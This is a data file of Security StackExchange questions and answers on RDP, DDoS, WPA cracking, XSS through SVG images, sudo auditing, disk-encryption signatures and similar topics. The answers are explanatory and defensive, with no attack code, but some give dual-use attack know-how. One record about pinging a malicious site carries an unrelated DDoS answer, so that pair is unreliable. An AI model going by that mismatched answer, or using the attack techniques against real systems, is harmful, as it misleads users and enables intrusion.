source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
133,342
I have a sort of a conflict with my company's Security Lead Engineer. He says that Remote Desktop Protocol (RDP) is not secure enough and we should be using TeamViewer instead. We use RDP not only to access local resources inside our corporate network but also for the access to resources (running Windows 2012+) in cloud hosting. In both the scenarios how secure is it to use RDP?
I believe that Teamviewer is a proxy service for tunnelled VNC connections. Hence, the first security consideration with regard to that service is that it is MITM'ed by design . There have been suggestions that the service was compromised a couple of months ago . (Note that although VNC uses encryption, the entire exchange is not, by default, encapsulated - but it's trivial to setup a SSL/ssh/VPN tunnel). Next consideration is that it means installing third party software on your systems - but then if you're running a Microsoft platform then you're already running software from multiple vendors which is probably not covered by your patch management software; keeping software up to date is one of the most effective means of protecting your systems. As long as your RDP connection is using SSL, it should be at least as secure as Teamviewer, and IMHO, a lot more so.
{ "source": [ "https://security.stackexchange.com/questions/133342", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80004/" ] }
133,347
A colleague of mine has a personal website in which he allows users to upload anything within a certain size, but before the actual upload he checks to see the file extension: if ( $type == 'image/gif'){ $ext = '.gif'; } elseif ( $type == 'image/jpeg'){ $ext = '.jpg'; } elseif ( $type == 'image/png' ){ $ext= '.png'; } else { $ext = '.png'; } He says to me, that by making all files images no harm can be done to the server. for example : evilscript.evil would become : evilscript.png And be thereby rendered useless. Is there any truth to his claims?
There are basically two main ways an uploaded file can be harmful: by being executed (as a script or binary) or by being run/used in an application and abusing an exploit in it (e.g. an uploaded MP3 which is then opened by a specific player, abusing a known weakness in it). In other words, it all depends what happens with the file after uploading. If someone is able to upload a Perl script, but the server never executes the uploaded files or even does not have Perl installed, nothing can ever happen. In general: if you make sure that the uploaded file is never run or interpreted you will be safe. Renaming the files only helps with one thing: on some operating systems, some file extensions may be linked with a specific application. If you rename the file you might prevent that the file will be opened with a linked application. But depending on the system and setup the uploaded files might still get opened with a vulnerable application. To stay in the above example: if any uploaded file gets opened with an MP3 player, even if you rename it to song.png , it would still be able to exploit a weakness in the player (except if the player has its own layer of checking and e.g. does only accept .mp3 files). The renamed files are not images suddenly, just because of the renaming. On Unix and similar systems, there is even the file command to analyze the type/MIME type of a file. Bottom line: in my eyes there is only one thing you can do. Be very specific in your setup about what can and will be done with the uploaded files. Any libraries, extensions or applications accepting these files should always be updated to the latest version.
{ "source": [ "https://security.stackexchange.com/questions/133347", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93973/" ] }
133,456
Can a DDoS attack reveal any information or be used to mount a hack? My understanding is that the whole point of DDoS or DoS is to consume all of the resources/overload the server causing it to crash. And that being the only reason to do a DDoS. I have heard that DDoS is used to get information. Is that true or totally false?
A DDoS will certainly give an attacker information about response times, load capability and routing. It may also give information about how incidents are handled internally and externally, as well as how they are reported to the public. But this is not what the main uses are. Generally the two key reasons for DDoS are to: take a service or website offline distract from a wider attack, exploit or intrusion The first is well known, very popular, and is relatively straightforward to carry out, with the only defence against a large attack being a high volume DDoS mitigation service. The second is more rarely used, but is being seen as a part of an attacker's toolset. Loading the incident response team can make it harder for them to detect an intrusion, can hide the real reason for the attack, and can hide evidence of an intrusion in amongst large numbers of log entries from the DDoS.
{ "source": [ "https://security.stackexchange.com/questions/133456", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121058/" ] }
133,457
If I do ping malicioussite.com or nslookup malicioussite.com , is there any risk for me? Will the people behind the malicious site know I'm looking them up? I'd like to make a program to use an IP address to find the domain and vice versa.
A DDoS will certainly give an attacker information about response times, load capability and routing. It may also give information about how incidents are handled internally and externally, as well as how they are reported to the public. But this is not what the main uses are. Generally the two key reasons for DDoS are to: take a service or website offline distract from a wider attack, exploit or intrusion The first is well known, very popular, and is relatively straightforward to carry out, with the only defence against a large attack being a high volume DDoS mitigation service. The second is more rarely used, but is being seen as a part of an attacker's toolset. Loading the incident response team can make it harder for them to detect an intrusion, can hide the real reason for the attack, and can hide evidence of an intrusion in amongst large numbers of log entries from the DDoS.
{ "source": [ "https://security.stackexchange.com/questions/133457", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121060/" ] }
133,967
I happened to come across this (govt) website which should be HTTPS-secured, but Chrome does not show the green lock. Instead it shows this: What does it mean? How can attackers leverage this vulnerability?
The page that your browser displays on the screen might consist of many elements: the HTML code, CSS, images, etc. Also some of the content might be provided, enhanced, or altered by (legitimate) scripts downloaded from the site. These elements might be included from the same server or from other servers. For Chrome to display the "Your connection to this site is private" message, for each element of the page: an encrypted HTTPS connection must be established site certificate (identity) must be valid non-deprecated protocols and algorithms must be used If one or more of the elements is included through a non-encrypted HTTP link, then: if it is a script, Chrome will display a message: Your connection to this site is not private because the site loaded an insecure script. In such case there is a possibility that the script was replaced with a malicious one. Any data you receive from the site or sent to the site can be intercepted and changed. if it is (only) a passive content (like an image), Chrome will display a message: Your connection to this site is private but someone on the network might be able to change the look of the page. In such case no one would be able to sniff on your data or read the information that the site provided. However by altering the look of the page you might be tricked into performing an action you did not originally intend to, for example resetting your password. Although the password change itself would be secure and legitimate, it might benefit the attacker. Also, this message is not 100% accurate. Depending on the actual passive content being included, a passive attacker can deduce what actions did you take on the encrypted site. Unlike with HTTPS, with HTTP the full URL would be visible, so if a certain page loaded a unique set of icons, an attacker would be able to tell you reached that page.
{ "source": [ "https://security.stackexchange.com/questions/133967", "https://security.stackexchange.com", "https://security.stackexchange.com/users/27588/" ] }
134,021
I saw in my Apache2 server logs messages like [ssl:error] [pid 28482] AH02032: Hostname xxx.yyy.zzz.www:443 provided via SNI and hostname xxx.yyy.zzz.www provided via HTTP are different One of these error message was triggered by a request from researchscan367.eecs.umich.edu , so I presume they are scanning for some known vulnerability. What kind of vulnerability or attack vector is prevented by the error?
What kind of vulnerability or attack vector is prevented by the error? The attack is called "virtual host confusion" and in 2014 several CDN were found vulnerable against it . The main idea is that a mismatch between the target name in the TLS handshake ( "provided via SNI" ) and the target name in the HTTP protocol ( "provided via HTTP" ) can be exploited. Depending on the setup of the server it might be used to impersonate HTTPS sites owned by others which also can be used to steal session cookies etc. For more information read the paper "Network-based Origin Confusion Attacks against HTTPS Virtual Hosting" , read the information at HackerOne , see a video of how this attack helps to "use Akamai to bypass Internet censorship" or see the talk at Blackhat 2014 where this and other attacks against TLS where demonstrated.
{ "source": [ "https://security.stackexchange.com/questions/134021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/51988/" ] }
134,228
Usually (as far as I know), FTP uses port 21. Since this port is used for FTP so often, is it safer to use another port? My guess is that if someone with malicious intentions tries to break FTP accounts, they will try port 21.
It is not safe to use ftp over any port. Those who have a malicious intent to get in your network or system will not scan your system for port 21 but for all ports, and will figure the other port in virtually no time. You are better with sftp as your file transfer tool. On the other hand, you have the option of adding some security to your ftp transfers and ports if you run it over a VPN tunnel instead.
{ "source": [ "https://security.stackexchange.com/questions/134228", "https://security.stackexchange.com", "https://security.stackexchange.com/users/121778/" ] }
134,392
Nowadays, many mobile phones have supported unlocking through fingerprint recognition. However, both iOS and Android require users to enter the password after the device is rebooted, even though an authorized fingerprint is given. My question is: why?
First: password is used to get access to the full disk encryption key fingerprint is used to unlock the screen (of an already "decrypted" device) Encryption key retrieval must be: accurate - on each entry, the device must transform the password through a key-derivation function into the one and only correct encryption key, otherwise the device won't be able to decrypt the data secure - derived through a one-way function, not "unlocked" by comparing data provided by a user with a pattern stored on the device Fingerprint recognition does not meet the above requirements, it is: fuzzy - on each press the sensor provides the device an approximate image of a part of a fingerprint which is matched at a certain accuracy; on each verification attempt the actual data differs due to different position, skew, press strength non-secure - recognition is performed by comparing the actual fingerprint with the data stored on the device - this data must be both readable and modifiable which makes it vulnerable to an attacker
{ "source": [ "https://security.stackexchange.com/questions/134392", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102733/" ] }
134,504
What’s the difference between the process of attacking WPA and the process of attacking WPA2? I know that WPA2 is much more secure than WPA. However, it seems the case that both of them are attacked using the same mechanism — basically, capturing the handshake and then doing brute-force. Are both protocols equally vulnerable to brute-force?
WPA was just a quick update to WEP protocol to solve some security problems until the final version of 802.11i standard was delivered. The message integrity check, per-packet key hashing, broadcast key rotation, sequence counter and key mixing function were updated from WEP in order to patch some of the current vulnerabilities. This is why in some cases, WPA is considered to be a draft of 802.11i standard. The main difference between WPA and WPA2 is the encryption protocol used: TKIP used by WPA, still uses RC4 cipher as WEP, so apart from the patched vulnerabilities it has some new ones like MIC key recovery and an extended version of chop-chop WEP attack. WPA2 was the final implementation of 802.11i and it introduces a new encryption protocol CCMP. This new protocol uses a stronger cipher AES-256, which represents a huge improvement from RC4. Aside from this main difference, both WPA and WPA2 uses the same key exchange mechanism. The 4-way handshake is used to exchange encryption keys, so therefore this is why you can attack WPA/WPA2 in the same way, by capturing its handshake and bruteforcing PMK/PTK: The attacker tries various passphrases, computes PMK and PTK using those passphrases, and then verifies the MAC in order to check if the passphrase was correct.
{ "source": [ "https://security.stackexchange.com/questions/134504", "https://security.stackexchange.com", "https://security.stackexchange.com/users/112259/" ] }
134,582
Do I need to buy a firewall? The website networksecure247.com is trying to sell me one. They call and say that "alerts" keep coming up on my network. I have a 2013 Dell computer, and the firewall from Microsoft expired on August 16. This company, Network Secure, is telling me that I need a firewall. Do I?
You needn't buy anything from someone who calls you unsolicited and tells you need to buy something from them. In fact, you're generally better off not buying things from people who call you unsolicited. In fact, you're generally better off not even listening to people who call you unsolicited to sell you things, and just hang up on them instead. Particularly when they lie to you about things like "alerts keep coming up on your network" which is patently absurd. The Microsoft firewall does not expire. Not on 8/16/16, or on any other date. It is a component of Windows and is good for all eternity, or as long as your computer lasts, whichever comes first. There is no need to buy an additional host-based (runs on your computer, in other words) firewall.
{ "source": [ "https://security.stackexchange.com/questions/134582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122130/" ] }
134,679
The way that we hash passwords and the strength of password is important because if someone gets access to the hashed passwords, it's possible to try lots and lots of passwords in a surprisingly short amount of time and crack anything that is weak. The question I have is how is it that the attacker get access to the hashed passwords in the first place. If they have access to the /etc/shadow file, for example, isn't it already game over? Is it simply bad permissions settings? Backups? Other mistakes? Is it that once one system is compromised, the password from there are used to attempt to get into other systems? I guess ultimately my query boils down to the implication I get from reading about this subject that it's inevitable that the attacker will get access to the hashes. How does that happen in practice?
There are any number of ways: SQL injection Leaked backups Disgruntled employees leaking them Any kind of breach of the server that allows code execution. As you can see there are many, many ways this could happened - as phihag mention in comments, more than half of the OWASP top 10 could lead to leaked hashes - so they can not be easily tabulated in a post. This does not mean that it is inevitable that hackers gets the hashes, but you should still use a good hashing algorithm to protect yourself and your users just in case. Since a backup may be lost or your server hacked without you ever noticing, having properly hashed passwords should be the only thing that allows you to sleep at night. This strategy is known as "defence in depth" , or just simply "plan for the worst".
{ "source": [ "https://security.stackexchange.com/questions/134679", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88460/" ] }
134,767
How can an ISP with low bandwidth like 50 Gbps handle a DDoS attack with more than this? I know there is a solution called "Black Hole". Is this enough to mitigate DDoS attacks or are there any other enterprise solutions? What kind of DDoS mitigating services are now available? Can CDN mitigate DDoS attack?
There are a number of strategies, each having their own costs and benefits. Here are a few (there are more, and variations): blackholing By blackholing traffic, you discard all traffic towards the target IP address. Typically, ISP's try to use RTBH (remotely triggered blackholing), by which they can ask their upstream networks to discard the traffic, so it won't even reach the destination network. The benefit here is that it will not saturate the ISP's uplinks then. The biggest drawback here is that you do exactly what the attackers want: the target IP address (and thus the services running on it) is offline. However, the rest of the ISP's customers will not suffer from the attack, and the costs are low. selective blackholing Instead of blackholing an IP-address for the entire internet, it may be useful to change BGP routing for the targeted address range so that it's only reachable for parts of the internet. This is typically called ' selective blackholing ' and is implemented by a number of large carriers. The idea is that many internet services only need to be available in a specific region (typically being a country or continent). For example, using selective blackholing, a Dutch ISP under attack could choose to have it's IP-ranges blackholed for traffic coming from China, while European IP's would be able to reach the targeted address. This technique can work very well if attack traffic is coming from very different sources than regular traffic. scrubbing A nicer solution is to use a scrubbing center, usually hosted outside the ISP's network as a service. When under DDoS attack, the ISP redirects traffic for that IP-range to the scrubbing center. The scrubbing center has the equipment to filter unwanted traffic, leaving a stream of (mostly) clean traffic which gets routed back to the ISP. Compared to blackholing this is a better solution since the services on the target IP remain available. The drawback is that most scrubbing centers are commercial, and can cost quite a lot. Also, scrubbing is not always easy, there can be both false positives (wanted traffic being filtered) and false negatives (unwanted traffic not being filtered). traffic engineering ISP networks usually have a number of connections to the internet via transit providers and/or internet exchange points. By making these connections, as well as links within the backbone of the ISP, much bigger than is needed for normal traffic patterns, the network can cope with DDoS attacks. However, there's a practical limit to this, since unused bandwidth capacity is costly (for example investing in 100Gbps equipment and upstream connections is very expensive and cost-inefficient if you're only doing a few Gbps) and this usually only moves the problem to somewhere within the network: somewhere there will be a switch, router or server with smaller capacity, and that will become the choke point. With some attacks, ISP's may be able to balance incoming traffic in a way so not all external connections will be flooded, and only one or a few will become saturated. Within larger networks, it's possible to create a "sinkhole" router which only attracts traffic for the IP-range under attack. Traffic towards all other IP-ranges gets routed over other routers. This way, the ISP is able to isolate the DDoS to a certain degree by announcing the targeted IP-range in BGP only on the sinkhole router, while stopping announcement of that IP-range on other routers. Traffic from the internet to that destination will be forced through that router. This may lead to all uplinks of that sinkhole router being saturated, but uplinks on other routers will not be flooded and other IP-ranges will not be affected. The big drawback here is that the entire range in which the targeted IP is (at least a /24) may suffer from this. This solution is often the last resort. local filtering If the ISP has enough capacity on its uplinks (so they won't be saturated), they can implement local filtering. This can be done in various ways, for example: adding an access list on routers rejecting traffic on characteristics like the source address or destination port. If the number of source IP-addresses in an attack is limited, this can work efficiently implementing traffic rate limiters to reduce the amount of traffic to the target IP-address routing traffic through local scrubbing boxes which filter unwanted traffic implementing BGPFlowspec , which allows routers to implement an exchange filter rules using BGP (for example: 'reject all traffic from IP-address X to IP-address Y protocol UDP source port 123') content delivery networks and load balancing Web hosters can use content delivery networks (CDNs) to host their websites. CDNs use global load balancing and thus have enormous amounts of bandwidth and caching server clusters all over the world, making it hard to take down a website completely. If one set of servers goes down due to a DDoS, traffic gets redirected automatically to another cluster. A number of big CDNs also operate as scrubbing service. On a somewhat smaller scale, local load balancing can be deployed. In that case, a pool of servers is available to host a website or web application. Traffic gets distributed over servers in that pool by a load balancer, thus increasing the amount of server capacity available, which may help to withstand a DDoS-attack. Of course, CDNs and load balancing only work for hosting, it doesn't work for access ISP's.
{ "source": [ "https://security.stackexchange.com/questions/134767", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122088/" ] }
134,813
I have a website that is available on the public internet. The website requires authenticated login before any of the content can be accessed. I've been asked if I can remove the login wall for users on a single static IP (the organisation's office) to allow them to read the content. Login would still be required for any write operations. This feels like a bad idea to me, but I'm struggling to come up with a concrete reason not to. Auditing read access to the content isn't a concern for the client. Ignoring the possibility that the IP address could change, are there any reasons why this is a bad idea? Are there any ways this could be exploited?
You don't have to worry about spoofing the IP from a different connection, because returned TCP packets would not make it to the attacker in that scenario. So all you have to worry about is how easy it is for the attacker to make use of that IP: Is that IP shared between multiple computers in the office? Can that IP be used on WiFi? How well is the password kept when a visitor says 'can I use your WiFi'? Are all the computers with access to that IP well secured, and have competent users? If the IP is not well kept, then you should ask In addition to IP, can you have a cookie stored on the single machine that is authorized? (i.e. a limited-use Remember Me feature) I commend your client for not using the Remember Password feature as is so tempting to do. Also, how secure is your content? What are the damages of the content being viewed by unauthorized persons? What type of attackers would be attracted to your content?
{ "source": [ "https://security.stackexchange.com/questions/134813", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122327/" ] }
134,939
Example URL www.[somewebsite].com/[10_digit_number] Getting the correct number loads a page. I know there would be 10 billion possible digits to choose from, but how long would it take? What are the resources one would need?
About a day If we're lucky: there's no throttling, we can perform each test with a HEAD request, can perform many tests on a single HTTP connection with Keepalive, and can have many concurrent connections. In that case we're mostly limited by bandwidth. Say we craft a tight request that is 100 bytes, that means we need to send a total of 100 * 10 10 bytes. And lets suppose we have a decent 100 Mbps connection, which will do about 10 megabytes per second. That would take 100,000 seconds - just over a day. This is best case, in practice there are likely to be issues that prevent it working so fast. We could have multiple systems working simultaneously to make it faster - but at some point we'll overload the server.
{ "source": [ "https://security.stackexchange.com/questions/134939", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122460/" ] }
135,211
I've been reading a bit about neural networks, and their ability to approximate many complex functions. Wouldn't a neural network be capable of cracking a hashing algorithm like SHA256? For example, say we want to train our network to crack strings of 8 characters that were hashed. We could go through all the permutations and train the network since we know the inputs and expected outputs. Would the network technically be able to crack a relatively good amount of SHA256 hashes that map back to 8-character strings? Has this been done previously?
No. Neural networks are pattern matchers. They're very good pattern matchers, but pattern matchers just the same. No more advanced than the biological brains they are intended to mimic. More thorough, more tireless, but not more sophisticated. The patterns have to be there to be found. There has to be a bias in the data to tease out. But cryptographic hashes are explicitly and extremely carefully designed to eliminate any bias in the output. No one bit is more likely than any other, no one output is more likely to correlate to any given input. If such a correlation were found, the hash would be considered "broken" and a new algorithm would take its place. Flaws in hash functions have been found before , but never with the aid of a neural network. Instead it's been with the careful application of certain mathematical principles.
{ "source": [ "https://security.stackexchange.com/questions/135211", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34785/" ] }
135,352
Every hardening guide I read recommends forbidding to login to root account and instead using sudo . I can understand this if you set a strict sudoers file which only enables the necessary commands for each group and user. But on every server I put my foot on, I have only witnessed a non restrictive sudo configuration. I would like to understand if it is a good practice or not and why (still, I understand the traceability reason)? So here are my questions : Is it enough to forbid su and allow sudo in order to keep the traceability of the administrator actions ? (I can imagine a scenario where a user does a lot of sudo actions before deleting his bash_history) Is there another source beside .bash_history useful to keep traceability ? can such a file be updated by an administrator (with sudo) ? Is it possible to restrict sudo -i and sudo -s in the configuration ? Can sudo command have utility without a strong sudoers configuration ? If yes, which ones? Moreover, for a single user, I see only advantages to forbid sudo and enable su . Indeed, Log on with root and normal user using the same password seems to be a bad practice.
Your question is rather broad, touching on several different subjects. It may be better to take some of the details and put them in a separate question. Is it enough to forbid su and allow sudo in order to keep the traceability of the administrator actions? ... can sudo command have utility without a strong sudoer configuration ? which ones ? Unrestricted sudo has a couple benefits over su . Each sudoer can use his personal password. This way you do not have to re-distribute the root password if it is changed. sudo can be configured to log activity. If your syslog configuration writes to a remote location, then it becomes difficult for someone to cover their tracks. However, unrestricted root access is still 'unrestricted'. If you do not use a remote syslog server then tracks can easily be covered. For convenience, folks often will use sudo -s to get an interactive shell. This allows you to get bash autocomplete on restricted directories. Unfortunately, the syslog benefits are void if a person is allowed to run sudo -s . Also there are many alternatives to sudo -s that can allow commands to be run without specific logging. (I can imagine a scenario where a user does a lot of sudo actions before deleting his bash_history) bash_history is not to be used as a history trace tool. It is only for user convenience. Is there another source beside .bash_history useful to keep traceability? can such a file be updated by an administrator (with sudo)? Any files on the server can be updated by a person with unrestricted root access. (whether via sudo or su ) How to trace the activity of a root user may be the subject of a different question. I believe advanced configurations of SELinux can do this, but it is probably not practical. I don't know of any other way to trace activity of a root user. As I said if you have any logging that will have to be written to a remote log server to keep those from being erased by the attacker. is it possible to restrict sudo -i and sudo -s in the configuration ? To answer you verbatim, this may be possible, but is beyond the scope of this post. Consider creating a new question. However, this will not solve your problem. For example, one could use sudo su instead of sudo -s . One could use sudo sudoers , or update the crontab , etc. The only way to solve this is to 'restrict' the sudo abilities using a whitelist. As you said, this is not nearly as common, but is certainly the only way to accomplish the goal of reliable traceability with any level of detail. Hope this helps. Feel free to ask for clarification on my answer, or post a more specific question if you have new questions based on what you learned so far.
{ "source": [ "https://security.stackexchange.com/questions/135352", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38142/" ] }
135,359
This is a follow up on Is there a legitimate reason I should be required to use my company’s computer . Mostly, because I see a huge issue in a couple of specific situations. Had I been in a position of the security engineer for an organization I would definitely put a policy that only company computers shall be used. That does make sense, and protects not only company data but the liability of employees. Yet, there is one case in which such a policy bugs me: A competent developer (I'm not talking about a junior developer, I'm talking about a middle to senior level developer) will potentially have on his work machine: 17 database engines; 20 docker containers; 10 test virtual machines (let's say using something like qemu ). That is a very common scenario in startups and post-startups (a startup that managed to survive several years). Moreover, this developer will be changing his docker containers and virtual machines every week, since he will probably be testing new technology. Requiring this developer to refer to the security engineer to install new software every time is completely impractical. Moreover, since a company would have more than one such developer, going with the typical company managed computers for everyone involves drawbacks: Maintaining the computers of, say, six such developers is a full time job for a competent security engineer. The manager of those developers will be terribly angry because what his team is doing for 50% of their work-time is to wait for the security engineer. On the other hand allowing the developers to use the machines freely is dangerous: one rogue docker container or virtual machine and you have an insider. I would even say that these developer's computers are more dangerous than that of a common user (say, a manager with spreadsheet software). How do you make sensible policies for competent developers? Here are some other solutions I could think of (or saw in the past), most of which were pretty bad: Disallow internet access from the development machines: You need internet access to read documentation; You need to access repositories, often found on the internet. Give developers two computers, one for internet and one for development machines: Complaints about lost productivity: typing Alt+2 to get the browser is faster than switching to another computer; Repository access is cumbersome: download in one place, copy to the other. Encourages the developer to circumvent the security and make a USB-based connection between both machines, so he can work from a single computer (saw it happening more than once). Move development to the servers (i.e. not development on desk machines): This is just moving the same problem deeper, now the rogue container is on the server; Arguably worse than allowing the developer to do what he pleases on his own machine. There must be a better way.
Separate development and production It is usual practice to give developers local admin / root rights on their workstation. However, developers should only have access to development environments and never have access to live data. Sys-admins - who do have access to production - should have much more controlled workstations. Ideally, sys-admin workstations should have no Internet access, although that is rare in practice. A variation I have seen is that developers have a locked-down corporate build, but can do whatever they want within virtual machines. However, this can be annoying for developers, as VMs have reduced performance, and the security benefits are not that great. So it's more common to see developers simply having full access to their own workstation.
{ "source": [ "https://security.stackexchange.com/questions/135359", "https://security.stackexchange.com", "https://security.stackexchange.com/users/112042/" ] }
135,486
I'm helping with a one-hour training for developers (~100 of them) on cross-site scripting. What are some concepts you think are indispensable to get across to them? Right now we have: Difference between reflected and stored Layers of defense ( WAFs , browser defenses, server headers, and secure coding) Secure coding and context of encoding parameters And most of all, the potential impact of vulnerabilities.
From a developer's perspective, the first two points you have are not very relevant. Stored and Reflected XSS have the same mitigation: properly escape things you output according to their context. Layers of defense will likely only be viewed as an excuse for poorly implementing this mitigation: "The WAF will catch it for me." Instead, focus on these code hygiene practices: Validate, not escape, at input. Input validation should be only for ensuring the input makes sense, not that it is "safe". It's impossible to know at this point whether it is safe, since you don't know all the places it will be used. Assume all data is unsafe. Never make the assumption that some data has been escaped, or does not include tags or quotes or entities or whatever. Understand that unsafe input can come from anywhere: HTTP headers, cookies, URL parameters, bulk import data, etc. Escape at point of use. Escape the data for the context in which it is used, when it is used. Only want to escape once to improve performance? Name the destination variable according to where it is safe to use: jsstringsafeEmail , htmlattrsafeColor , htmltextsafeFullName , etc.
{ "source": [ "https://security.stackexchange.com/questions/135486", "https://security.stackexchange.com", "https://security.stackexchange.com/users/13768/" ] }
135,499
If I have selected a good password and kept it secret, what is the point of encrypting my home directory, as a setup option with some flavors of Linux offer during setup? Won't the Linux permissions keep unwanted eyes away from my stuff?
The point is to protect against your disk being accessed outside of the OS. Encryption is useful against attackers who have physical access to your computer. Without it, it would be trivial to read out the content of your home directory, for example by plugging in a live boot USB stick.
{ "source": [ "https://security.stackexchange.com/questions/135499", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76484/" ] }
135,513
Most WAFs when blocking XSS will block obvious tags like script and iframe , but they don't block img . Theoretically, you can img src='OFFSITE URL' , but what's the worse that can happen? I know you can steal IPs with it, but is that it?
Like Anders says: Blender makes a very good point about authentications dialogs, and multithr3at3d is right about the on attributes. Moreover, Anders add argues about the a tag and Matija have a good link about exploiting libraries doing the rendering. Yet, no one talked about SVG yet. First of all let's assume that all input and output is properly sanitized so tricks with onerror / onload are not possible. And that we are not interested in CSRF. We are after XSS. The first concern about <img src= is that it does not follow same origin policy. But that is probably less dangerous than it sounds. What the browser does to render an < img > tag < img src="http://domain/image.png" > is pretty safe because the browser will not invoke a parser (e.g. an XML or HTML parser), it knows that what will come is an image (gif, jpeg, png). The browser will perform the HTTP request, and it will simply read the MIME of what came (in the Conetent-Type header, e.g. image/png ). If the answer does not have a Content-Type several browsers will guess based on the extension, yet they will only guess image MIMEs: image/jpeg , image/png or image/gif (tiff, bmp and ppm are dubious, some browsers may have a limited support to guess them). Some browsers may even try to guess the image format based on magic numbers, but then again they will not try to guess esoteric formats. If the browser can match the (possibly guessed) MIME it loads the correct rendering library, rendering libraries may have an overflow but that is another story. If the MIME does not match against an image rendering library the image is discarded. If the rendering library call fails the image is discarded as well. The browser is never even close to an execution (script) context. Most browsers enter execution context only from the javascript parser, and they can only reach the javascript parser from the application/javascript MIME or from the XML or the HTML parsers (since they may have embedded scripts). To perform XSS we need an execution context. Enters SVG. Using < img src="domain/blah/blah/tricky.svg" > Ouch, ouch ouch. SVG is an XML based vector graphic format, therefore it invokes the XML parser in the browser. Moreover SVG has the <script> tag! Yes, you can embed javascript directly into SVG. This is not as dangerous as it sounds at first. Browsers that support SVG inside <img> tags do not support scripting inside the context . Ideally you should use SVG inside <embed> or <object> tags where scripting is supported by browsers. Yet, do not do it for user provided content! I would argue that allowing SVG inside <img src= may be dangerous: An XML parser is used to parse the SVG, whether it is inside the <img> or <object> tag. The parser is certainly tweaked with some parameters to ignore <script> tags in the <img> context. Yet, that is quite ugly, it is blacklisting a tag in a certain context. And blacklisting is poor security. <script> is not the only way to achieve execution context in SVG, there are also the onmouseover (and family) events present in SVG. This is again tricky to blacklist. The XML parser in browsers did suffer from problems in the past, notable with XML comments around script blocks. SVG may present similar problems. SVG has full support for XML namespaces. Ouch again. xlink:href is a completely valid construct in SVG and the browser inside the XML parser context will likely follow it. Therefore yes, SVG opens several possible vectors to achieve execution context. And moreover, it is a relatively new technology and therefore not well hardened. I would not be surprised to see CVEs on SVG handling. For example ImageMagick had problems with SVG .
{ "source": [ "https://security.stackexchange.com/questions/135513", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123045/" ] }
135,834
Is it possible to tell if a hard drive is encrypted, regardless of what software was used, i.e., Truecrypt / VeraCrypt / Bitlocker for AES-256? Just the other day, I thought it could be possible to tell if I scan the drive with "Sector View" to read the data. If the data is filled with randomness then that means that it is encrypted. Is it that easy to tell?
We have two types of encryption here, "file based encryption" and "full disk encryption". There are documented forensics methods and software (e.g. EnCase) that help us detect the schemes and programs used to encrypt the disk. I'm going to take a list of popular tools and standards and see if they leave any traces with which we can determine that they've been used: Bitlocker Bitlocker is a full disk encryption standard available on windows operating system from Windows 7 onwards; this tool uses AES256 to encrypt the disk. A disk encrypted by bitlocker is different than a normal NTFS disk. The signature of " -FVE-FS- " can be found at the beginning of bitlocker encrypted volumes. These volumes can also be identified by a GUID: for BitLocker: 4967d63b-2e29-4ad8-8399-f6a339e3d00 for BitLocker ToGo: 4967d63b-2e29-4ad8-8399-f6a339e3d01 DiskCryptor/TrueCrypt/VeraCrypt DiskCryptor is based on TrueCrypt. For both DiskCryptor and TrueCrypt we can detect their presence with the following criteria: size of file or collection of clusters object is a multiple of 512, minimum size of object is 19KB, although by default is minimum 5MB, contains no specific file signature throughout the entire object, and has a high Shannon entropy or passes Chi-squared distribution test. Note that since there's no specific signature or header left behind we can't tell for sure if TrueCrypt (or its siblings) were used, by combination of several methods we can try to make better guess about its presence. FileVault Filevault is Bitlocker's equivalent on Mac and offers full disk encryption. The signature of " encrdsa " or hex value of " 65 6E 63 72 63 64 73 61 " can be found at the beginning of FileVault encrypted volumes. cryptsetup with LUKS Linux Unified Key Setup is a disk encryption specification and can be used in cryptsetup on Linux which is a common tool for storage media volumes encryption. It is optional and users can choose not to use this format but if used we can detect its presence with " LUKS\xba\xbe " signature at the beginning of the volumes. Check Point Full Disk Encryption At sector offset 90 of the VBR, the product identifier " Protect " can be found. Hex value " 50 72 6F 74 65 63 74 " GuardianEdge Encryption Plus/Anywhere/Hard Disk Encryption and Symantec Endpoint Encryption At sector offset 6 MBR, the product identifier " PCGM " can be found. Hex value " 50 43 47 4D " McAfee Safeboot/Endpoint Encryption At sector offset 3 MBR, the product identifier " Safeboot " can be found. Hex value " 53 61 66 65 42 6F 6F 74 " Sophos Safeguard Enterprise and Safeguard Easy For Safeguard Enterprise, at sector offset 119 of the MBR, the product identifier " SGM400 " can be found. Hex value " 53 47 4D 34 30 30 3A " Symantec PGP Whole disk Encryption At sector offset 3 MBR, the product identifier " ëH|PGPGUARD " can be found. Hex value " EB 48 90 50 47 50 47 55 41 52 44 " Measuring File Randomness To Detect Encryption Methods discussed earlier may not be feasible for every disk/file encryption scheme since not all of them have specific properties that we can exploit to detect them. One other method is to measure the randomness of files and the closer they are to random, the more certain we are that encryption is used. To do this we can use a Python script named file_entropy.py . The closer the entropy value is to 8.0, the higher the entropy. We can extend this further and draw plots to visualize the distribution of bytes. ( calculate-file-entropy ) One other pointer to detect encryption is that no known file signature will be spotted in the volume. (No jpg, no office documents, no known file types) And since compression methods (e.g. gzip , rar and zip ) have known signatures we can differentiate them from encryption for the most part. Sum up Use known signatures to detect encryption (if possible) Use special characteristics (minimum file size, high entropy, absence of any special file signature, etc.) to detect encryption Rule out compressed files using their signature So going back to the main question, " Is it that easy to tell? ", this falls under forensics methods, we may be dealing with steganography techniques. In a normal case where user isn't trying to fool us, it is somehow easy to tell encryption is in place but in real world scenarios where user's may try to hide things and deceive us they may just pipe /dev/urandom to a file! It's not gonna be easy.
{ "source": [ "https://security.stackexchange.com/questions/135834", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31093/" ] }
135,884
